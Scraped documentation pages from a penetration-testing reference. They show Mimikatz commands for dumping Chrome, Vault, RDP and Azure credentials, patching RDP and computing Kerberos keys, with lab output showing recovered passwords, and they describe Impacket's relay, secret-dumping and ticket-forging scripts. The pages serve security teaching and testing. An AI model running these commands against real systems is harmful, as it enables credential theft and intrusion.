[Previousdpapi](https://tools.thehacker.recipes/mimikatz/modules/dpapi) [Nextcache](https://tools.thehacker.recipes/mimikatz/modules/dpapi/cache) Last updated 3 years ago --- # cloudapreg | The Hacker Tools `dpapi::cloudapreg` dumps azure credentials by querying the following registry location: Copy HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\AAD\Storage [Previouscloudapkd 🛠️](https://tools.thehacker.recipes/mimikatz/modules/dpapi/cloudapkd) [Nextcng](https://tools.thehacker.recipes/mimikatz/modules/dpapi/cng) Last updated 3 years ago --- # chrome | The Hacker Tools `dpapi::chrome` dumps stored credentials and cookies from Chrome. (cf. [dumping DPAPI secrets](https://www.thehacker.recipes/ad-ds/movement/credentials/dumping/dpapi-protected-secrets) ) It has the following command line arguments: * `in`: the `C:\Users\\AppData\Local\Google\Chrome\User Data\Default\Login Data` for the saves logins and the `C:\Users\AppData\Local\Google\Chrome\User Data\Default\Cookies` for the cookies * `key`: it is the _**key**_ output value of the `dpapi::masterkey in:"C:\Users\\AppData\Roaming\Microsoft\Protect\SID\MasterKey_ID" /rpc`. it is useful for offline dumping of Chrome. CoreSecurity has published an excellent [guide](https://www.coresecurity.com/core-labs/articles/reading-dpapi-encrypted-keys-mimikatz) on how this can be accomplished offline * `state`: TODO * `encryptedkey`: TODO * `/password`: the user's password to use for decryption * `/masterkey`: the masterkey to use for decryption. It can be obtained through [`sekurlsa::dpapi`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/dpapi) . * `/unprotect`: display the decryption results on screen Copy mimikatz # dpapi::chrome /in:"C:\Users\m3g9tr0n\AppData\Local\Google\Chrome\User Data\Default\Login Data" /masterkey:3f7a17dd6658319fcd4b832afc20ac7dacbb9d7cd668527c71f98e90464624634c614a7923a3beb23c4e24dd718f2a8e838ce72935fb29f11507affb543a53c3 > Encrypted Key found in local state file > Encrypted Key seems to be protected by DPAPI * volatile cache: GUID:{5c22983f-77ee-41e4-9086-8073d664e417};KeyHash:850247e2dd89c50536c05bdcee1a56c395e752cf;Key:available * masterkey : 3f7a17dd6658319fcd4b832afc20ac7dacbb9d7cd668527c71f98e90464624634c614a7923a3beb23c4e24dd718f2a8e838ce72935fb29f11507affb543a53c3 > AES Key is: fd0635bf2e19d76231f649f48f4a90df3de80d3f83aa5ad016b3155fdab37fa2 URL : https://login.live.com/ ( https://login.live.com/login.srf ) Username: [email protected] * using BCrypt with AES-256-GCM Password: MySecretPass [Previouscapi](https://tools.thehacker.recipes/mimikatz/modules/dpapi/capi) [Nextcloudapkd 🛠️](https://tools.thehacker.recipes/mimikatz/modules/dpapi/cloudapkd) Last updated 2 years ago --- # hash | The Hacker Tools `kerberos::hash` computes the different types of Kerberos keys for a given password. It has the following command line arguments: * `/user`: the `sAMAccountName` of the user * `/password`: the plaintext password * `/domain`: the active directory domain * `/count`: number of iterations Copy mimikatz # kerberos::hash /user:m3g9tr0n /domain:hacklab.local /password:Super_SecretPass1! * rc4_hmac_nt b09a14d2d325026f8986d4a874fbcbc7 * aes128_hmac f99e642fe29c8aa84e047876d29fc4f7 * aes256_hmac f5b77681af657ccec49e707c2e2f8fc1dc958088f8dc99f09ce3818183cf2392 * des_cbc_md5 d3f89befcb43ce52 [Previousgolden](https://tools.thehacker.recipes/mimikatz/modules/kerberos/golden) [Nextlist](https://tools.thehacker.recipes/mimikatz/modules/kerberos/list) Last updated 3 years ago --- # purge | The Hacker Tools `kerberos::purge` purges all kerberos tickets similar to [`klist purge`](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist) . Copy mimikatz # kerberos::purge Ticket(s) purge for current session is OK [Previousptt](https://tools.thehacker.recipes/mimikatz/modules/kerberos/ptt) [Nexttgt](https://tools.thehacker.recipes/mimikatz/modules/kerberos/tgt) Last updated 3 years ago --- # SMB | The Hacker Tools [PreviousLibrary](https://tools.thehacker.recipes/impacket/library) [NextLDAP](https://tools.thehacker.recipes/impacket/library/ldap) Last updated 3 years ago --- # NTLM | The Hacker Tools [PreviousMSRPC](https://tools.thehacker.recipes/impacket/library/msrpc) [NextKerberos](https://tools.thehacker.recipes/impacket/library/kerberos) Last updated 3 years ago --- # Hashcat | The Hacker Tools [for Active Directory](https://www.thehacker.recipes/ad/movement/credentials/cracking) [Official docs](https://hashcat.net/wiki/) [Previouswmiquery.py](https://tools.thehacker.recipes/impacket/examples/wmiquery.py) Last updated 2 years ago --- # MSRPC | The Hacker Tools [PreviousLDAP](https://tools.thehacker.recipes/impacket/library/ldap) [NextNTLM](https://tools.thehacker.recipes/impacket/library/ntlm) Last updated 3 years ago --- # Kerberos | The Hacker Tools [PreviousNTLM](https://tools.thehacker.recipes/impacket/library/ntlm) [NextScript examples](https://tools.thehacker.recipes/impacket/examples) Last updated 3 years ago --- # LDAP | The Hacker Tools [PreviousSMB](https://tools.thehacker.recipes/impacket/library/smb) [NextMSRPC](https://tools.thehacker.recipes/impacket/library/msrpc) Last updated 3 years ago --- # Library | The Hacker Tools [SMB](https://tools.thehacker.recipes/impacket/library/smb) [LDAP](https://tools.thehacker.recipes/impacket/library/ldap) [MSRPC](https://tools.thehacker.recipes/impacket/library/msrpc) [NTLM](https://tools.thehacker.recipes/impacket/library/ntlm) [Kerberos](https://tools.thehacker.recipes/impacket/library/kerberos) [PreviousImpacket](https://tools.thehacker.recipes/impacket) [NextSMB](https://tools.thehacker.recipes/impacket/library/smb) Last updated 3 years ago --- # Impacket | The Hacker Tools [](https://tools.thehacker.recipes/impacket#setup) Setup ------------------------------------------------------------- * **Requirements:** * [Python](http://www.python.org/) interpreter (version 2.7, 3.6, 3.7, 3.8 or 3.9). * [Third-party](https://github.com/SecureAuthCorp/impacket/blob/master/requirements.txt) packages also needed. * **Installing:** * Grab the latest stable release ([gzip’d tarbal](https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_24/impacket-0.9.24.tar.gz) ), unpack it and run: \*\*\*\* `python3 -m pip install .` (or `python2 -m pip install .` for Python 2.x) from the directory where you placed it. This will install the classes into the default Python modules path; note that you might need special permissions to write there. * **Docker Support:** * Build Impacket’s image: `docker build -t “impacket:latest” .` * Using Impacket’s image: `docker run -it –rm “impacket:latest”` [](https://tools.thehacker.recipes/impacket#library-protocols) Library Protocols ------------------------------------------------------------------------------------- * [psexec.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/psexec.py) PSEXEC like functionality example using RemComSvc ([https://github.com/kavika13/RemCom](https://github.com/kavika13/RemCom) ). * [smbexec.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/smbexec.py) A similar approach to PSEXEC w/o using RemComSvc. The technique is described [here](https://web.archive.org/web/20140625065218/http://blog.accuvant.com/rdavisaccuvant/owning-computers-without-shell-access/) . Our implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available. * [atexec.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/atexec.py) This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command. * [wmiexec.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/wmiexec.py) A semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy. * [dcomexec.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/dcomexec.py) A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects. * [GetTGT.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/getTGT.py) Given a password, hash or aesKey, this script will request a TGT and save it as ccache. * [GetST.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/getST.py) Given a password, hash, aesKey or TGT in ccache, this script will request a Service Ticket and save it as ccache. If the account has constrained delegation (with protocol transition) privileges you will be able to use the -impersonate switch to request the ticket on behalf another user. * [GetPac.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/getPac.py) This script will get the PAC (Privilege Attribute Certificate) structure of the specified target user just having a normal authenticated user credentials. It does so by using a mix of \[MS-SFU\]’s S4USelf + User to User Kerberos Authentication. * [GetUserSPNs.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/GetUserSPNs.py) This example will try to find and fetch Service Principal Names that are associated with normal user accounts. Output is compatible with JtR and HashCat. * [GetNPUsers.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/GetNPUsers.py) This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF\_DONT\_REQUIRE\_PREAUTH). Output is compatible with JtR. * [raiseChild.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/raiseChild.py) This script implements a child-domain to forest privilege escalation by (ab)using the concept of Golden Tickets and ExtraSids. * [rbcd.py](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/rbcd.py) : Example script for handling the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer. * [ticketConverter.py](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/ticketConverter.py) : This script will convert kirbi files, commonly used by mimikatz, into ccache files used by Impacket, and vice versa. * [ticketer.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/ticketer.py) This script will create Golden/Silver tickets from scratch or based on a template (legally requested from the KDC) allowing you to customize some of the parameters set inside the PAC\_LOGON\_INFO structure, in particular the groups, ExtraSids, duration, etc. * [secretsdump.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/secretsdump.py) Performs various techniques to dump secrets from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\\Temp directory) and read the rest of the data from there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL\_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. The script initiates the services required for its working if they are not available (e.g. Remote Registry, even if it is disabled). After the work is done, things are restored to the original state. * [mimikatz.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/mimikatz.py) Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi. * [ntlmrelayx.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/ntlmrelayx.py) This script performs NTLM Relay Attacks, setting an SMB and HTTP Server and relaying credentials to many different protocols (SMB, HTTP, MSSQL, LDAP, IMAP, POP3, etc.). The script can be used with predefined attacks that can be triggered when a connection is relayed (e.g. create a user through LDAP) or can be executed in SOCKS mode. In this mode, for every connection relayed, it will be available to be used later on multiple times through a SOCKS proxy. * [karmaSMB.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/karmaSMB.py) A SMB Server that answers specific file contents regardless of the SMB share and pathname specified. * [smbserver.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/smbserver.py) A Python implementation of an SMB server. Allows to quickly set up shares and user accounts. * [wmiquery.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/wmiquery.py) It allows to issue WQL queries and get description of WMI objects at the target system (e.g. select name from win32\_account). * [wmipersist.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/wmipersist.py) This script creates/removes a WMI Event Consumer/Filter and link between both to execute Visual Basic based on the WQL filter or timer specified. * [goldenPac.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/goldenPac.py) Exploit for MS14-068. Saves the golden ticket and also launches a PSEXEC session at the target. * [sambaPipe.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/sambaPipe.py) This script will exploit CVE-2017-7494, uploading and executing the shared library specified by the user through the -so parameter. * [smbrelayx.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/smbrelayx.py) Exploit for CVE-2015-0005 using a SMB Relay Attack. If the target system is enforcing signing and a machine account was provided, the module will try to gather the SMB session key through NETLOGON. * [smbclient.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/smbclient.py) A generic SMB client that will let you list shares and files, rename, upload and download files and create and delete directories, all using either username and password or username and hashes combination. It’s an excellent example to see how to use impacket.smb in action. * [addcomputer.py](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/addcomputer.py) : Allows to add a computer to a domain using LDAP or SAMR (SMB). * [getArch.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/getArch.py) This script will connect against a target (or list of targets) machine/s and gather the OS architecture type installed by (ab)using a documented MSRPC feature. * [exchanger.py](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/exchanger.py) : A tool for connecting to MS Exchange via RPC over HTTP v2. * [lookupsid.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/lookupsid.py) A Windows SID brute forcer example through \[MS-LSAT\] MSRPC Interface, aiming at finding remote users/groups. * [netview.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/netview.py) Gets a list of the sessions opened at the remote hosts and keep track of them looping over the hosts found and keeping track of who logged in/out from remote servers * [reg.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/reg.py) Remote registry manipulation tool through the \[MS-RRP\] MSRPC Interface. The idea is to provide similar functionality as the REG.EXE Windows utility. * [rpcdump.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/rpcdump.py) This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well known endpoints. * [rpcmap.py](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/rpcmap.py) : Scan for listening DCE/RPC interfaces. This binds to the MGMT interface and gets a list of interface UUIDs. If the MGMT interface is not available, it takes a list of interface UUIDs seen in the wild and tries to bind to each interface. * [samrdump.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/samrdump.py) An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service. * [services.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/services.py) This script can be used to manipulate Windows services through the \[MS-SCMR\] MSRPC Interface. It supports start, stop, delete, status, config, list, create and change. * [smbpasswd.py](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/smbpasswd.py) : This script is an alternative to smbpasswd tool and intended to be used for changing expired passwords remotely over SMB (MSRPC-SAMR) * [mssqlinstance.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/mssqlinstance.py) Retrieves the MSSQL instances names from the target host. * [mssqlclient.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/mssqlclient.py) An MSSQL client, supporting SQL and Windows Authentications (hashes too). It also supports TLS. * [esentutl.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/esentutl.py) An Extensible Storage Engine format implementation. Allows dumping catalog, pages and tables of ESE databases (e.g. NTDS.dit) * [ntfs-read.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/ntfs-read.py) NTFS format implementation. This script provides a mini shell for browsing and extracting an NTFS volume, including hidden/locked contents. * [registry-read.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/registry-read.py) A Windows Registry file format implementation. It allows to parse offline registry hives. * [findDelegation.py](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/findDelegation.py) : Simple script to quickly list all delegation relationships (unconstrained, constrained, resource-based constrained) in an AD environment. * [GetADUsers.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/GetADUsers.py) This script will gather data about the domain’s users and their corresponding email addresses. It will also include some extra information about last logon and last password set attributes. * [Get-GPPPassword.py](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/Get-GPPPassword.py) : This example extracts and decrypts Group Policy Preferences passwords using streams for treating files instead of mounting shares. Additionally, it can parse GPP XML files offline. * [mqtt\_check.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/mqtt_check.py) Simple MQTT example aimed at playing with different login options. Can be converted into a account/password brute forcer quite easily. * [rdp\_check.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/rdp_check.py) \[MS-RDPBCGR\] and \[MS-CREDSSP\] partial implementation just to reach CredSSP auth. This example tests whether an account is valid on the target host. * [sniff.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/sniff.py) Simple packet sniffer that uses the pcapy library to listen for packets in # transit over the specified interface. * [sniffer.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/sniffer.py) Simple packet sniffer that uses a raw socket to listen for packets in transit corresponding to the specified protocols. * [ping.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/ping.py) Simple ICMP ping that uses the ICMP echo and echo-reply packets to check the status of a host. If the remote host is up, it should reply to the echo probe with an echo-reply packet. * [ping6.py:](https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_24/examples/ping6.py) Simple IPv6 ICMP ping that uses the ICMP echo and echo-reply packets to check the status of a host. [](https://tools.thehacker.recipes/impacket#resource) Resource ------------------------------------------------------------------- [![Logo](https://tools.thehacker.recipes/~gitbook/image?url=https%3A%2F%2Fwww.secureauth.com%2Fwp-content%2Fthemes%2Fsecure-auth%2Fimg%2Ffavicon%2Fapple-touch-icon.png&width=20&dpr=4&quality=100&sign=82661dd9&sv=2)Resource HubSecureAuth](https://www.secureauth.com/labs/open-source-tools/impacket/) [Previouslist](https://tools.thehacker.recipes/mimikatz/modules/vault/list) [NextLibrary](https://tools.thehacker.recipes/impacket/library) Last updated 3 years ago --- # revert | The Hacker Tools `token::revert` reverts to the initial tokens mimikatz had on startup. Copy mimikatz # token::revert * Process Token : {0;080fd6c8} 3 F 137701065 hacklab\m3g9tr0n S-1-5-21-2725560159-1428537199-2260736313-1730 (15g,26p) Primary * Thread Token : no token [Previouslist](https://tools.thehacker.recipes/mimikatz/modules/token/list) [Nextrun](https://tools.thehacker.recipes/mimikatz/modules/token/run) Last updated 2 years ago --- # mstsc | The Hacker Tools `ts::mstsc` can be used to extract cleartext credentials from the mstsc process (client side) Copy mimikatz # privilege::debug Privilege '20' OK mimikatz # ts::mstsc !!! Warning: false positives can be listed !!! | PID 2992 mstsc.exe (module @ 0x000000000055F6F0) ServerName [wstring] '192.168.0.239' ServerFqdn [wstring] '' UserSpecifiedServerName [wstring] '192.168.0.239' UserName [wstring] 'administrator' Domain [wstring] 'hacklab' Password [protect] 'Super_SecretPass1!' SmartCardReaderName [wstring] '' PasswordContainsSCardPin [ bool ] FALSE ServerNameUsedForAuthentication [wstring] '192.168.0.239' RDmiUsername [wstring] 'hacklab\administrator' It must be noted that an RDP session must be running in order to retrieve credentials via `ts::mstsc`. It comes in handy in jumpbox servers! _(Demonstration target is a Windows 10 Pro)_ [Previouslogonpasswords](https://tools.thehacker.recipes/mimikatz/modules/ts/logonpasswords) [Nextmultirdp](https://tools.thehacker.recipes/mimikatz/modules/ts/multirdp) Last updated 3 years ago --- # vault | The Hacker Tools This module of Mimikatz interacts with the [Windows Credentials Vault](https://support.microsoft.com/en-us/windows/accessing-credential-manager-1b5c916a-6a16-889f-8581-fc16e8165ac0) . DPAPI is a better alternative option for getting the same results. [Previoussessions](https://tools.thehacker.recipes/mimikatz/modules/ts/sessions) [Nextcred](https://tools.thehacker.recipes/mimikatz/modules/vault/cred) Last updated 3 years ago --- # list | The Hacker Tools `vault::list` lists saved credentials in the Windows Vault such as scheduled tasks, RDP, Internet Explorer for the current user. More information can be found at Benjamin's guide [howto-~-scheduled-tasks-credentials](https://github.com/gentilkiwi/mimikatz/wiki/howto-~-scheduled-tasks-credentials) . Copy mimikatz # vault::list Vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28} Name : Web Credentials Path : C:\Users\m3g9tr0n\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 Items (1) 0. Internet Explorer Type : {3ccd5499-87a8-4b10-a215-608888dd3b55} LastWritten : 13/12/2021 21:33:59 Flags : 00000400 Ressource : [STRING] https://login.live.com/ Identity : [STRING] [email protected] Authenticator : PackageSid : *Authenticator* : [STRING] MySuperDuperPass Vault : {77bc582b-f0a6-4e15-4e80-61736b6f3b29} Name : Windows Credentials Path : C:\Users\m3g9tr0n\AppData\Local\Microsoft\Vault Items (1) 0. (null) Type : {3e0e35be-1b77-43e7-b873-aed901b6275b} LastWritten : 12/12/2021 00:39:57 Flags : 00000000 Ressource : [STRING] Domain:target=TERMSRV/192.168.0.224 Identity : [STRING] hacklab\m3g9tr0n Authenticator : PackageSid : *Authenticator* : [BYTE*] *** Domain Password *** [Previouscred](https://tools.thehacker.recipes/mimikatz/modules/vault/cred) [NextImpacket](https://tools.thehacker.recipes/impacket) Last updated 3 years ago --- # cred | The Hacker Tools `vault::cred` enumerates vault credentials. More information can be found at Benjamin's guide [howto-~-scheduled-tasks-credentials](https://github.com/gentilkiwi/mimikatz/wiki/howto-~-scheduled-tasks-credentials) . It has the following command line argument: * `/patch`: [according to Benjamin](https://twitter.com/gentilkiwi/status/1241786155458277378) this option must be avoided as it is not OPSEC safe and DPAPI is a better solution Copy mimikatz # vault::cred TargetName : TERMSRV/192.168.0.224 / UserName : hacklab\m3g9tr0n Comment : Type : 2 - domain_password Persist : 2 - local_machine Flags : 00000000 Credential : Attributes : 0 TargetName : Domain:target=TERMSRV/192.168.0.224 / UserName : hacklab\m3g9tr0n Comment : Type : 2 - domain_password Persist : 2 - local_machine Flags : 00000000 Credential : Attributes : 0 TargetName : WindowsLive:target=virtualapp/didlogical / UserName : 02ihgxxcusaapvlp Comment : PersistedCredential Type : 1 - generic Persist : 2 - local_machine Flags : 00000000 Credential : Attributes : 32 Copy mimikatz # vault::cred /patch TargetName : TERMSRV/192.168.0.224 / UserName : hacklab\m3g9tr0n Comment : Type : 2 - domain_password Persist : 2 - local_machine Flags : 00000000 Credential : Suoer_SecretPass1! Attributes : 0 TargetName : Domain:target=TERMSRV/192.168.0.224 / UserName : hacklab\m3g9tr0n Comment : Type : 2 - domain_password Persist : 2 - local_machine Flags : 00000000 Credential : Suoer_SecretPass1! Attributes : 0 TargetName : WindowsLive:target=virtualapp/didlogical / UserName : 02ihgxxcusaapvlp Comment : PersistedCredential Type : 1 - generic Persist : 2 - local_machine Flags : 00000000 Credential : Attributes : 32 [Previousvault](https://tools.thehacker.recipes/mimikatz/modules/vault) [Nextlist](https://tools.thehacker.recipes/mimikatz/modules/vault/list) Last updated 3 years ago --- # logonpasswords | The Hacker Tools `ts::logonpasswords` extracts clear text credentials from RDP running sessions (server side). It supports RDP clients utilizing [**mstscax.dll**](https://docs.microsoft.com/en-us/windows/win32/termserv/mstscax) like mRemoteNG, Remote Desktop Manager, RDCMan and of course the Windows native one. It also supports X11 RDP clients such as rdesktop and freerdp. Copy mimikatz # privilege::debug Privilege '20' OK Copy mimikatz # ts::logonpasswords !!! Warning: false positives can be listed !!! * Web Credentials? * Domain : hacklab.local UserName : Administrator * Marshaled: [BinaryBlob] e7 03 00 00 00 00 00 00 e4 a2 a6 9d 83 c5 bd 0c 3a a7 72 4f 88 dc d3 b4 e0 bf 11 ca 71 11 65 cc 16 c0 58 5a 56 49 1b eb 12 b1 e5 a1 d2 25 e6 8c 08 62 92 aa 04 45 1e 3b * Web Credentials? * Domain : hacklab.local UserName : Administrator * Marshaled: [BinaryBlob] e7 03 00 00 00 00 00 00 e4 a2 a6 9d 83 c5 bd 0c 3a a7 72 4f 88 dc d3 b4 e0 bf 11 ca 71 11 65 cc 16 c0 58 5a 56 49 1b eb 12 b1 e5 a1 d2 25 e6 8c 08 62 92 aa 04 45 1e 3b Domain : hacklab UserName : Administrator Password/Pin: Super_SecretPass1! _(Demonstration target is a Windows Server 2016 Essentials)_ [Previousts](https://tools.thehacker.recipes/mimikatz/modules/ts) [Nextmstsc](https://tools.thehacker.recipes/mimikatz/modules/ts/mstsc) Last updated 3 years ago --- # ts | The Hacker Tools [logonpasswords](https://tools.thehacker.recipes/mimikatz/modules/ts/logonpasswords) [mstsc](https://tools.thehacker.recipes/mimikatz/modules/ts/mstsc) [multirdp](https://tools.thehacker.recipes/mimikatz/modules/ts/multirdp) [remote](https://tools.thehacker.recipes/mimikatz/modules/ts/remote) [sessions](https://tools.thehacker.recipes/mimikatz/modules/ts/sessions) [Previouswhoami](https://tools.thehacker.recipes/mimikatz/modules/token/whoami) [Nextlogonpasswords](https://tools.thehacker.recipes/mimikatz/modules/ts/logonpasswords) Last updated 3 years ago --- # multirdp | The Hacker Tools `ts::multirdp` can be used to enable multiple RDP connections on the target server. You do not need to patch the RDP service on Windows Servers since multiple RDP connections are allowed, There are two local administrator users: * `m3g9tr0n` (Local Administrator) * `hacklab.local\m3g9tr0n` (Domain user part of the local administrators group) ![](https://tools.thehacker.recipes/~gitbook/image?url=https%3A%2F%2F894632015-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MiRT0QHotSpofwDFs_w%252Fuploads%252Fgit-blob-42374690abf74c54e45b253b868b1b264fe5b552%252Fmulti-rdp_3.PNG%3Falt%3Dmedia&width=768&dpr=4&quality=100&sign=95598c8a&sv=2) Local admins on the target Windows 7 Copy mimikatz # privilege::debug Privilege '20' OK Copy mimikatz # ts::multirdp "TermService" service patched As a result, it is possible to initiate another RDP connection while the other user is already connected. ![](https://tools.thehacker.recipes/~gitbook/image?url=https%3A%2F%2F894632015-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F-MiRT0QHotSpofwDFs_w%252Fuploads%252Fgit-blob-6305e9eec28d65ae9b7ad67cbb536acb107462de%252Fmulti-rdp_2.PNG%3Falt%3Dmedia&width=768&dpr=4&quality=100&sign=dccd39b3&sv=2) RDP successful patching According to [Benjamin Delpy](https://twitter.com/gentilkiwi/status/1246510049293451266) , the `multirdp` module still works on the following recent versions of Windows: * Windows Server 2019 - Windows NT 10.0 build 17763 (arch x64) * Windows 10 1909 - Windows NT 10.0 build 18363 (arch x64) _(Demonstration target is a Windows 7, domain joined, workstation.)_ [Previousmstsc](https://tools.thehacker.recipes/mimikatz/modules/ts/mstsc) [Nextremote](https://tools.thehacker.recipes/mimikatz/modules/ts/remote) Last updated 3 years ago --- # localtime | The Hacker Tools `standard::localtime` or `localtime` displays system local date and time Copy mimikatz # localtime Local: 8/27/2021 11:31:57 PM Zone : GMT Daylight Time UTC : 8/27/2021 10:31:57 PM [Previoushostname](https://tools.thehacker.recipes/mimikatz/modules/standard/hostname) [Nextlog](https://tools.thehacker.recipes/mimikatz/modules/standard/log) Last updated 3 years ago --- # sleep | The Hacker Tools `standard::sleep` or `sleep` make Mimikatz sleep an amount of milliseconds. It has the following command line arguments: * positional argument number: the number of milliseconds to sleep (n.b. default is 1s) Copy mimikatz # sleep Sleep : 1000 ms... End ! Copy mimikatz # sleep 600 Sleep : 600 ms... End ! [Previouslog](https://tools.thehacker.recipes/mimikatz/modules/standard/log) [Nextversion](https://tools.thehacker.recipes/mimikatz/modules/standard/version) Last updated 3 years ago --- # log | The Hacker Tools `standard::log` or `log` logs mimikatz input/output to a file. It has the following command line arguments: * positional argument: the filename for the log file (by default it is `mimikatz.log`) * `/stop`: stop the file logging Copy mimikatz # log Using 'mimikatz.log' for logfile : OK Copy mimikatz # log output.log Using 'output.log' for logfile : OK Copy mimikatz # log /stop Using '(null)' for logfile : OK [Previouslocaltime](https://tools.thehacker.recipes/mimikatz/modules/standard/localtime) [Nextsleep](https://tools.thehacker.recipes/mimikatz/modules/standard/sleep) Last updated 3 years ago --- # version | The Hacker Tools `standard::version` or `version` displays the version in use of Mimikatz. It has the following command line arguments: * `/full`: it displays all the DLLs used by Mimikatz * `/cab`: it creates a **.cab** file for troubleshooting purposes Copy mimikatz # version mimikatz 2.2.0 (arch x64) Windows NT 10.0 build 19042 (arch x64) msvc 150030729 207 Benjamin has provided the following values: * `150030729 207` is the WinDDK compiler * `150030729 1` is the vc90 compiler (Visual Studio 2008) * `160040219 1` is the vc100 compiler (Visual Studio 2010) * `170061030 0` is the vc110(\_xp) compiler (Visual Studio 2012) * `180040629 0` is the vc120(\_xp) compiler (Visual Studio 2013) * `190023026 0` is the vc140(\_xp) compiler (Visual Studio 2015) Copy mimikatz # version /full mimikatz 2.2.0 (arch x64) Windows NT 10.0 build 19042 (arch x64) msvc 150030729 207 lsasrv.dll : 10.0.19041.1288 msv1_0.dll : 10.0.19041.1023 tspkg.dll : 10.0.19041.264 wdigest.dll : 10.0.19041.388 kerberos.dll : 10.0.19041.1288 dpapisrv.dll : 10.0.19041.746 cryptdll.dll : 10.0.19041.546 samsrv.dll : 10.0.19041.1202 rsaenh.dll : 10.0.19041.1052 ncrypt.dll : 10.0.19041.662 ncryptprov.dll : 10.0.19041.1202 wevtsvc.dll : 10.0.19041.1266 termsrv.dll : 10.0.19041.1202 Copy mimikatz # version /cab mimikatz 2.2.0 (arch x64) Windows NT 10.0 build 19042 (arch x64) msvc 150030729 207 CAB: mimikatz_x64_sysfiles_19042 -> lsasrv.dll -> msv1_0.dll -> tspkg.dll -> wdigest.dll -> kerberos.dll -> dpapisrv.dll -> cryptdll.dll -> samsrv.dll -> rsaenh.dll -> ncrypt.dll -> ncryptprov.dll -> wevtsvc.dll -> termsrv.dll 